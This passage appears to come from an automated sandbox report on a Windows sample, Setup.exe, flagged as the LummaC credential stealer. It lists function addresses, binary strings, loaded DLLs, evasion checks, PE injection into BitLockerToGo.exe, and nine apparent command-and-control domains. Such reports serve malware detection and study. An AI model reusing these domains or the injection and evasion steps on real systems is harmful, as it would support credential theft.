                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004165C21_2_004165C2
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0043B5A01_2_0043B5A0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004036601_2_00403660
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004466001_2_00446600
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0041243E1_2_0041243E
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004406801_2_00440680
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004256A61_2_004256A6
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004116B11_2_004116B1
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004096BA1_2_004096BA
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0041E7601_2_0041E760
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004077C01_2_004077C0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040D7A01_2_0040D7A0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004208701_2_00420870
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0043B8001_2_0043B800
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004138961_2_00413896
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004149591_2_00414959
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004469201_2_00446920
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0044392C1_2_0044392C
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004239301_2_00423930
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0043A9AD1_2_0043A9AD
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0042BA601_2_0042BA60
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00406A001_2_00406A00
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00444A301_2_00444A30
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0042DAC21_2_0042DAC2
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00413AD01_2_00413AD0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0042FB401_2_0042FB40
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00444B601_2_00444B60
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00416B1F1_2_00416B1F
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040BB201_2_0040BB20
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0042EB301_2_0042EB30
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00429B311_2_00429B31
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00421BC01_2_00421BC0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040AB801_2_0040AB80
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00410B801_2_00410B80
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00414B821_2_00414B82
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040DC201_2_0040DC20
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00444A301_2_00444A30
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0041CC891_2_0041CC89
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00444D001_2_00444D00
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00404D101_2_00404D10
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00418D101_2_00418D10
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00444DE01_2_00444DE0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040EDF01_2_0040EDF0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00406DA01_2_00406DA0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0042DDA01_2_0042DDA0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00427E5D1_2_00427E5D
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0042CE101_2_0042CE10
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0043FEC01_2_0043FEC0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00444EB01_2_00444EB0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00434F401_2_00434F40
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040DF6A1_2_0040DF6A
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00443FE01_2_00443FE0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00409F801_2_00409F80
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00423FA01_2_00423FA0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 0040DE40 appears 187 times
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 0040C660 appears 57 times
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 1648
                    Source: Setup.exe, 00000000.00000002.1918803772.00000000038B6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs Setup.exe
                    Source: Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000000.00000002.1919656324.0000000003CD6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@4/0@11/9
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0043C0AC CoCreateInstance,1_2_0043C0AC
                    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\ab153e92-85ab-4968-9838-9558fcb1e72fJump to behavior
                    Source: Setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Setup.exeVirustotal: Detection: 19%
                    Source: Setup.exeString found in binary or memory: runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine <no value>value for arg %d: %w(BADINDEX)%!(NOVERB)complex128t.Kind == 12207031256103515625ParseFloatINT2VECTOR_OIDVECTOR_TINTERVAL_TIMESTAMP_REFCURSORANYELEMENT_GTSVECTOR_REGCONFIG_INT4RANGE_TSTZRANGE_DATERANGE_INT8RANGEmyhostname.localhostunixpacketwsarecvmsgwsasendmsgIP address netGo = ChorasmianDevanagariGlagoliticKharoshthiManichaeanOld_ItalicOld_PermicOld_TurkicOld_UyghurPhoenicianSaurashtra,c=biws,r=res binderres masterresumptionexp masterSHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1execerrdotSYSTEMROOTBackupReadConnectionKeep-Alivelocal-addrimage/webpimage/jpegRST_STREAMEND_STREAMSet-Cookie; Expires=; Max-Age=; HttpOnly stream=%d:authorityset-cookiekeep-aliveconnectionequivalentHost: %s
                    Source: Setup.exeString found in binary or memory: stopm spinning nmidlelocked= needspinning=randinit twicestore64 failedmemprofileratesemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module data in goroutine runtime: seq1=runtime: goid=RegSetValueExWlen of type %s.WithoutCancel.WithDeadline(Read Committedunsafe.Pointer on zero Valuereflect.Value.unknown methodinvalid syntax1907348632812595367431640625PG_DDL_COMMAND_TXID_SNAPSHOT_REGDICTIONARYunexpected EOFinternal error.in-addr.arpa.unknown mode: \.+*?()|[]{}^$bad record MACboringcrypto:
                    Source: Setup.exeString found in binary or memory: gogoproto.unsafe_unmarshaler_allgogoproto.goproto_extensions_mapvarint,64028,opt,name=protosizervarint,65012,opt,name=wktpointersha3: write to sponge after readgoogle.protobuf.EnumValueOptions&descriptor.FileDescriptorProto{&descriptor.EnumDescriptorProto{&descriptor.UninterpretedOption{SigEd25519 no Ed25519 collisionsblake2b: write to XOF after readblake2s: write to XOF after readinvalid_indicator_parameter_valueinvalid_row_count_in_limit_clausenull_value_no_indicator_parametersequence_generator_limit_exceededbranch_transaction_already_activefdw_invalid_data_type_descriptorsmissing character after backslashfailed to get Kerberos ticket: %qunexpected DataRow after error %s ISOLATION LEVEL READ UNCOMMITTEDunknown response for CopyFail: %qcouldn't parse pem in sslrootcertapplication/x-www-form-urlencoded/memory/classes/heap/unused:bytesmaximum of %d attributes exceededrelease of handle with refcount 0crypto/aes: output not full blockbytes.Buffer.Grow: negative countbytes.Reader.Seek: invalid whencetoo many levels of symbolic linksInitializeProcThreadAttributeListImage base beyond allowed addressThunk AddressOfData beyond limitsCentral Kurdish Iraq (ku-Arab-IQ)Norwegian (Bokmal) Norway (nb-NO)could not find signer certificateinvalid VS_VERSION_INFO block. %ssync: RUnlock of unlocked RWMutexslice bounds out of range [%x:%y]runtime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of rangeruntime: type offset out of rangeincompatible types for comparisoncannot index slice/array with nilsql: connection is already closedreflect: slice index out of rangereflect: NumOut of non-func type of method on nil interface valuereflect: Field index out of rangereflect: array index out of rangereflect.Value.Equal: invalid Kind to pointer to array with length 142108547152020037174224853515625710542735760100185871124267578125go package net: confVal.netCgo = tls: failed to write to key log: tls: invalid server finished hashtls: unexpected ServerKeyExchangetls: unknown public key algorithmx509: invalid RSA public exponentx509: SAN rfc822Name is malformedx509: invalid extended key usagesunsupported compression format %sError: Logrus exit handler error:pseudo header field after regularhttp: invalid Read on closed Bodynet/http: skip alternate protocolhttp: CloseIdleConnections calledinvalid header field value for %qpad size
                    Source: Setup.exeString found in binary or memory: gogoproto.unsafe_unmarshaler_allgogoproto.goproto_extensions_mapvarint,64028,opt,name=protosizervarint,65012,opt,name=wktpointersha3: write to sponge after readgoogle.protobuf.EnumValueOptions&descriptor.FileDescriptorProto{&descriptor.EnumDescriptorProto{&descriptor.UninterpretedOption{SigEd25519 no Ed25519 collisionsblake2b: write to XOF after readblake2s: write to XOF after readinvalid_indicator_parameter_valueinvalid_row_count_in_limit_clausenull_value_no_indicator_parametersequence_generator_limit_exceededbranch_transaction_already_activefdw_invalid_data_type_descriptorsmissing character after backslashfailed to get Kerberos ticket: %qunexpected DataRow after error %s ISOLATION LEVEL READ UNCOMMITTEDunknown response for CopyFail: %qcouldn't parse pem in sslrootcertapplication/x-www-form-urlencoded/memory/classes/heap/unused:bytesmaximum of %d attributes exceededrelease of handle with refcount 0crypto/aes: output not full blockbytes.Buffer.Grow: negative countbytes.Reader.Seek: invalid whencetoo many levels of symbolic linksInitializeProcThreadAttributeListImage base beyond allowed addressThunk AddressOfData beyond limitsCentral Kurdish Iraq (ku-Arab-IQ)Norwegian (Bokmal) Norway (nb-NO)could not find signer certificateinvalid VS_VERSION_INFO block. %ssync: RUnlock of unlocked RWMutexslice bounds out of range [%x:%y]runtime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of rangeruntime: type offset out of rangeincompatible types for comparisoncannot index slice/array with nilsql: connection is already closedreflect: slice index out of rangereflect: NumOut of non-func type of method on nil interface valuereflect: Field index out of rangereflect: array index out of rangereflect.Value.Equal: invalid Kind to pointer to array with length 142108547152020037174224853515625710542735760100185871124267578125go package net: confVal.netCgo = tls: failed to write to key log: tls: invalid server finished hashtls: unexpected ServerKeyExchangetls: unknown public key algorithmx509: invalid RSA public exponentx509: SAN rfc822Name is malformedx509: invalid extended key usagesunsupported compression format %sError: Logrus exit handler error:pseudo header field after regularhttp: invalid Read on closed Bodynet/http: skip alternate protocolhttp: CloseIdleConnections calledinvalid header field value for %qpad size
                    Source: Setup.exeString found in binary or memory: net/addrselect.go
                    Source: Setup.exeString found in binary or memory: google.golang.org/grpc@v1.65.0/internal/balancerload/load.go
                    Source: Setup.exeString found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
                    Source: Setup.exeString found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
                    Source: C:\Users\user\Desktop\Setup.exeFile read: C:\Users\user\Desktop\Setup.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
                    Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 1648
                    Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeSection loaded: acgenral.dllJump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: Setup.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: Setup.exeStatic file information: File size 19250176 > 1048576
                    Source: Setup.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x8af000
                    Source: Setup.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x890a00
                    Source: Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: Binary string: BitLockerToGo.pdb source: Setup.exe, 00000000.00000002.1918803772.00000000038B6000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: BitLockerToGo.pdbGCTL source: Setup.exe, 00000000.00000002.1918803772.00000000038B6000.00000004.00001000.00020000.00000000.sdmp
                    Source: Setup.exeStatic PE information: section name: .symtab
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0041A2AB push edx; iretd 1_2_0041A2AD
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0043FE30 push eax; mov dword ptr [esp], E0E7E6E5h1_2_0043FE3E
                    Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Found evasive API chain checking for user administrative privileges
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_1-19453
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 5016Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: BitLockerToGo.exe, 00000001.00000003.1944436767.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.00000000005E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.00000000005BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0Q_%SystemRoot%\system32\mswsock.dll
                    Source: Setup.exe, 00000000.00000002.1915546297.000000000061A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_1-19454
                    Source: C:\Users\user\Desktop\Setup.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004425F0 LdrInitializeThunk,1_2_004425F0
                    Source: C:\Users\user\Desktop\Setup.exeProcess token adjusted: DebugJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\Setup.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\Setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5AJump to behavior
                    LummaC encrypted strings found
                    Source: Setup.exe, 00000000.00000002.1918803772.0000000003892000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: drawwyobstacw.sbs
                    Source: Setup.exe, 00000000.00000002.1918803772.0000000003892000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: condifendteu.sbs
                    Source: Setup.exe, 00000000.00000002.1918803772.0000000003892000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: ehticsprocw.sbs
                    Source: Setup.exe, 00000000.00000002.1918803772.0000000003892000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: vennurviot.sbs
                    Source: Setup.exe, 00000000.00000002.1918803772.0000000003892000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: resinedyw.sbsy
                    Source: Setup.exe, 00000000.00000002.1918803772.0000000003892000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: enlargkiw.sbsy
                    Source: Setup.exe, 00000000.00000002.1918803772.0000000003892000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: allocatinow.sbs
                    Source: Setup.exe, 00000000.00000002.1918803772.0000000003892000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: mathcucom.sbsy
                    Source: Setup.exe, 00000000.00000002.1918803772.0000000003892000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: proclaimykn.buzz
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\Setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2800008Jump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000Jump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 447000Jump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 44A000Jump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 45A000Jump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeQueries volume information: C:\Users\user\Desktop\Setup.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeQueries volume information: C:\Windows VolumeInformationJump to behavior
